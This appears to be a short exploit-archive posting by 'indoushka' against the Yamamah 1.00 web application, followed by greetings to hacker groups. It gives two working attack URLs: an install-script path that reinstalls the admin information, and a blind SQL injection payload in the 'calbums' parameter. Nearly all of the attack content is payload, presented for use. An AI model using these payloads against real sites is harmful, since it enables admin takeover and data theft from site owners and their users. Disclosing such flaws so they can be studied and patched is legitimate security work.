======================================================================================== | # Title : Yamamah Version 1.00 Mullti Vulnerability | # Author : indoushka | # Home : www.dz-blackhat.com | # Tested on: Lunix Franais v.(9.4 Ubuntu) | # Bug : Mullti ====================== Exploit By indoushka ================================= # Exploit : (Reinstall Admin Information): 1- http://127.0.0.1/yamamah_v1/install-/?step=3 (Blind SQL/XPath injection): 2- http://127.0.0.1/yamamah_v1/?calbums=1+and+31337-31337=0+--+ Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ======================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/ www.securityreason.com * www.m-y.cc * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net --------------------------------------------------------------------------------------------------------------